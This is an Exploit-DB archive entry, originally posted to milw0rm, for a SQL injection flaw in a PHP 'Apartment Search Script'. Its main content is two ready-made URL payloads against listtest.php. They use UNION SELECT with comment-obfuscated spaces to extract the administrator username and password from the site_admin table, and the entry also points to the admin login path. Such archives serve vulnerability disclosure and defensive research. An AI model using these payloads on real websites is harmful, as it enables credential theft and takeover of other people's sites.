Apartment Search Script - 'listtest.php' SQL Injection

EDB-ID:

5471

CVE:

2008-1919

EDB Verified:

Author:

Crackers_Child

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2008-04-19

Vulnerable App:

$ Script        : Apartment Search Script SQL Injection Vulnerability

$ Script Info   : http://www.yourfreeworld.com/script/apartment.asp

$ Script Price  : Only $79

$ Demo          : http://www.downlinegoldmine.com/apartment/

$ Author        : Crackers_Child

$ Contact       : cashr00t@hotmail.com

$ Note          : Erbabi ile vurulduysak sirtimizdan neyleyelim.Bir Yarali Kurt Misali

$ Note          : Her Yanimiz it Tuzagi . . .

$ Username Exp  : www.x.com/script_path/listtest.php?r=-1/**/union/**/select/**/1,admin%20from%20site_admin/*

$ Password Exp  : www.x.com/script_path/listtest.php?r=-1/**/union/**/select/**/1,password%20from%20site_admin/*

$ Admin Login   : /Site_Admin/ 

$ Greetz        : Milw0rm.Com & All Peace Warriors

# milw0rm.com [2008-04-19]

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services